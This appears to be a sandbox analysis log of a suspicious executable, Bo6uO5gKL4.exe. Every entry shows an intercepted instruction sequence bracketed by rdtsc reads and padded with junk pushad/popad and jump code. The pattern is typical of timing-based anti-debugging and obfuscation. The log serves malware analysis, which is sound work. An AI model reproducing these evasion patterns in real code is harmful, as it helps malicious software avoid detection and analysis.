Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350C2D second address: 7350C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350C33 second address: 7350C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAACBBF1FBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350C42 second address: 7350C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350CB9 second address: 7350CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350CBF second address: 7350CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAAD0E3C67h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350CE2 second address: 7350D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3773B08Ah 0x00000008 mov eax, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d js 00007FAB1C80DBC0h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FAAACBBF206h 0x0000001b mov bx, cx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350D12 second address: 7350D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 7390h 0x00000007 pushfd 0x00000008 jmp 00007FAAAD0E3C69h 0x0000000d or ch, 00000016h 0x00000010 jmp 00007FAAAD0E3C61h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebp-04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FAAAD0E3C5Dh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350D5D second address: 7350D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350D63 second address: 7350D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350D67 second address: 7350DE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e jmp 00007FAAACBBF206h 0x00000013 lea eax, dword ptr [ebx+70h] 0x00000016 jmp 00007FAAACBBF200h 0x0000001b push 00000001h 0x0000001d pushad 0x0000001e mov cl, 30h 0x00000020 movsx ebx, ax 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edx 0x00000029 pop eax 0x0000002a pushfd 0x0000002b jmp 00007FAAACBBF203h 0x00000030 jmp 00007FAAACBBF203h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350DE4 second address: 7350E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAD0E3C5Fh 0x00000008 mov ax, 37EFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FAAAD0E3C65h 0x00000015 nop 0x00000016 jmp 00007FAAAD0E3C5Eh 0x0000001b lea eax, dword ptr [ebp-18h] 0x0000001e pushad 0x0000001f popad 0x00000020 nop 0x00000021 pushad 0x00000022 mov ecx, 59087351h 0x00000027 push eax 0x00000028 push edx 0x00000029 mov cx, CD53h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350E34 second address: 7350E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350E38 second address: 7350E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350E46 second address: 7350E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350E4A second address: 7350E5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350E5A second address: 7350E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350EE9 second address: 7350EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350EEF second address: 7350F48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FAB1C80D99Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FAAACBBF1FDh 0x00000018 or eax, 1A622FF6h 0x0000001e jmp 00007FAAACBBF201h 0x00000023 popfd 0x00000024 call 00007FAAACBBF200h 0x00000029 pop esi 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350F48 second address: 7350FC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007FAAAD0E3C60h 0x00000011 mov ecx, esi 0x00000013 jmp 00007FAAAD0E3C60h 0x00000018 mov dword ptr [esi+0Ch], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e call 00007FAAAD0E3C5Dh 0x00000023 pop ecx 0x00000024 pushfd 0x00000025 jmp 00007FAAAD0E3C61h 0x0000002a adc eax, 54AE6EC6h 0x00000030 jmp 00007FAAAD0E3C61h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350FC0 second address: 7350FD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 078D1650h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edx, 770206ECh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350FD8 second address: 7350FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7350FE8 second address: 7351039 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, FCB0h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, 00000000h 0x0000000f pushad 0x00000010 push ecx 0x00000011 pushfd 0x00000012 jmp 00007FAAACBBF201h 0x00000017 jmp 00007FAAACBBF1FBh 0x0000001c popfd 0x0000001d pop esi 0x0000001e popad 0x0000001f lock cmpxchg dword ptr [edx], ecx 0x00000023 jmp 00007FAAACBBF202h 0x00000028 pop edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop eax 0x0000002e mov cx, bx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351039 second address: 735103F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735103F second address: 7351043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351043 second address: 735107B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FAAAD0E3C60h 0x00000012 jne 00007FAB1CD322CBh 0x00000018 pushad 0x00000019 mov bx, ax 0x0000001c popad 0x0000001d mov edx, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735107B second address: 7351081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351081 second address: 73510C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 4065h 0x00000007 jmp 00007FAAAD0E3C62h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esi] 0x00000011 jmp 00007FAAAD0E3C60h 0x00000016 mov dword ptr [edx], eax 0x00000018 pushad 0x00000019 jmp 00007FAAAD0E3C5Eh 0x0000001e popad 0x0000001f mov eax, dword ptr [esi+04h] 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 mov edx, eax 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73510C9 second address: 7351165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FAAACBBF202h 0x0000000f and si, 3268h 0x00000014 jmp 00007FAAACBBF1FBh 0x00000019 popfd 0x0000001a popad 0x0000001b mov dword ptr [edx+04h], eax 0x0000001e pushad 0x0000001f mov edi, eax 0x00000021 pushfd 0x00000022 jmp 00007FAAACBBF200h 0x00000027 and si, 04C8h 0x0000002c jmp 00007FAAACBBF1FBh 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr [esi+08h] 0x00000036 jmp 00007FAAACBBF206h 0x0000003b mov dword ptr [edx+08h], eax 0x0000003e pushad 0x0000003f movzx eax, dx 0x00000042 push ebx 0x00000043 push ecx 0x00000044 pop edi 0x00000045 pop ecx 0x00000046 popad 0x00000047 mov eax, dword ptr [esi+0Ch] 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FAAACBBF1FCh 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351165 second address: 73511B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAAAD0E3C64h 0x00000013 adc ax, 9BE8h 0x00000018 jmp 00007FAAAD0E3C5Bh 0x0000001d popfd 0x0000001e mov ch, 27h 0x00000020 popad 0x00000021 mov eax, dword ptr [esi+10h] 0x00000024 pushad 0x00000025 push esi 0x00000026 mov dx, 1B2Eh 0x0000002a pop edi 0x0000002b popad 0x0000002c mov dword ptr [edx+10h], eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73511B4 second address: 735121D instructions: 0x00000000 rdtsc 0x00000002 mov si, A263h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FAAACBBF208h 0x0000000e and eax, 346A70A8h 0x00000014 jmp 00007FAAACBBF1FBh 0x00000019 popfd 0x0000001a popad 0x0000001b mov eax, dword ptr [esi+14h] 0x0000001e jmp 00007FAAACBBF206h 0x00000023 mov dword ptr [edx+14h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FAAACBBF207h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735121D second address: 7351263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov edi, 794BDE26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+18h] 0x00000010 pushad 0x00000011 push edi 0x00000012 pushfd 0x00000013 jmp 00007FAAAD0E3C66h 0x00000018 sub ch, FFFFFFC8h 0x0000001b jmp 00007FAAAD0E3C5Bh 0x00000020 popfd 0x00000021 pop ecx 0x00000022 mov dx, 120Ch 0x00000026 popad 0x00000027 mov dword ptr [edx+18h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351263 second address: 7351285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAAACBBF1FAh 0x0000000a or esi, 4E425A28h 0x00000010 jmp 00007FAAACBBF1FBh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351285 second address: 7351305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FAAAD0E3C65h 0x0000000b add eax, 22410A46h 0x00000011 jmp 00007FAAAD0E3C61h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+1Ch] 0x0000001d jmp 00007FAAAD0E3C5Eh 0x00000022 mov dword ptr [edx+1Ch], eax 0x00000025 jmp 00007FAAAD0E3C60h 0x0000002a mov eax, dword ptr [esi+20h] 0x0000002d pushad 0x0000002e pushad 0x0000002f mov dl, ch 0x00000031 movsx ebx, ax 0x00000034 popad 0x00000035 mov ebx, esi 0x00000037 popad 0x00000038 mov dword ptr [edx+20h], eax 0x0000003b pushad 0x0000003c jmp 00007FAAAD0E3C5Ah 0x00000041 mov di, cx 0x00000044 popad 0x00000045 mov eax, dword ptr [esi+24h] 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351305 second address: 7351377 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b jmp 00007FAAACBBF1FDh 0x00000010 mov eax, dword ptr [esi+28h] 0x00000013 jmp 00007FAAACBBF1FEh 0x00000018 mov dword ptr [edx+28h], eax 0x0000001b pushad 0x0000001c mov bh, al 0x0000001e pushfd 0x0000001f jmp 00007FAAACBBF203h 0x00000024 jmp 00007FAAACBBF203h 0x00000029 popfd 0x0000002a popad 0x0000002b mov ecx, dword ptr [esi+2Ch] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FAAACBBF205h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351377 second address: 735137D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735137D second address: 73513B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+2Ch], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAACBBF205h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73513B0 second address: 73513C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+30h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73513C2 second address: 73513C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73513C6 second address: 73513CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73513CC second address: 735145C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d pushad 0x0000000e jmp 00007FAAACBBF1FEh 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FAAACBBF200h 0x0000001a xor ecx, 5709F518h 0x00000020 jmp 00007FAAACBBF1FBh 0x00000025 popfd 0x00000026 jmp 00007FAAACBBF208h 0x0000002b popad 0x0000002c popad 0x0000002d mov ax, word ptr [esi+32h] 0x00000031 jmp 00007FAAACBBF200h 0x00000036 mov word ptr [edx+32h], ax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FAAACBBF207h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735145C second address: 7351474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAD0E3C64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351474 second address: 7351506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b pushad 0x0000000c jmp 00007FAAACBBF1FDh 0x00000011 push eax 0x00000012 pushfd 0x00000013 jmp 00007FAAACBBF207h 0x00000018 and ch, FFFFFFAEh 0x0000001b jmp 00007FAAACBBF209h 0x00000020 popfd 0x00000021 pop ecx 0x00000022 popad 0x00000023 mov dword ptr [edx+34h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007FAAACBBF208h 0x0000002e pushfd 0x0000002f jmp 00007FAAACBBF202h 0x00000034 and cl, FFFFFF88h 0x00000037 jmp 00007FAAACBBF1FBh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351506 second address: 73515FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAD0E3C5Fh 0x00000009 or si, 1ECEh 0x0000000e jmp 00007FAAAD0E3C69h 0x00000013 popfd 0x00000014 mov bx, si 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test ecx, 00000700h 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FAAAD0E3C68h 0x00000027 sub esi, 750DF278h 0x0000002d jmp 00007FAAAD0E3C5Bh 0x00000032 popfd 0x00000033 movzx esi, dx 0x00000036 popad 0x00000037 jne 00007FAB1CD31DF9h 0x0000003d jmp 00007FAAAD0E3C5Bh 0x00000042 or dword ptr [edx+38h], FFFFFFFFh 0x00000046 pushad 0x00000047 mov ecx, 1362FFBBh 0x0000004c mov dx, si 0x0000004f popad 0x00000050 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000054 pushad 0x00000055 pushfd 0x00000056 jmp 00007FAAAD0E3C68h 0x0000005b or si, D738h 0x00000060 jmp 00007FAAAD0E3C5Bh 0x00000065 popfd 0x00000066 jmp 00007FAAAD0E3C68h 0x0000006b popad 0x0000006c or dword ptr [edx+40h], FFFFFFFFh 0x00000070 jmp 00007FAAAD0E3C60h 0x00000075 pop esi 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 mov ax, di 0x0000007c movsx ebx, cx 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73515FA second address: 7351652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAACBBF201h 0x00000009 adc ax, C1E6h 0x0000000e jmp 00007FAAACBBF201h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FAAACBBF200h 0x0000001a xor ecx, 617D0588h 0x00000020 jmp 00007FAAACBBF1FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 pop ebx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov ch, EEh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351652 second address: 735166D instructions: 0x00000000 rdtsc 0x00000002 mov dl, 37h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ch, 60h 0x00000008 popad 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAAD0E3C5Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735166D second address: 7351682 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7351682 second address: 7351688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0C61 second address: 73A0C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0C67 second address: 73A0C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0C6B second address: 73A0C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FAAACBBF204h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0C92 second address: 73A0C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0C97 second address: 73A0CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop ebx 0x0000000f mov eax, 23FF5FFFh 0x00000014 popad 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0CC8 second address: 73A0CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0CCE second address: 73A0CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAACBBF1FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73A0CE0 second address: 73A0CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73406FF second address: 734071A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 734071A second address: 734074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAAAD0E3C68h 0x0000000a and eax, 53AF9088h 0x00000010 jmp 00007FAAAD0E3C5Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 734074A second address: 7340784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e mov edx, 246BC32Ch 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAAACBBF1FEh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 7340784 second address: 73407A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FAAAD0E3C5Bh 0x00000012 mov cx, FBAFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73407A7 second address: 73407BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAACBBF200h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 73407BB second address: 73407BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 72E0683 second address: 72E06B0 instructions: 0x00000000 rdtsc 0x00000002 mov si, 602Dh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FAAACBBF1FAh 0x0000000e or eax, 7AF0C8C8h 0x00000014 jmp 00007FAAACBBF1FBh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
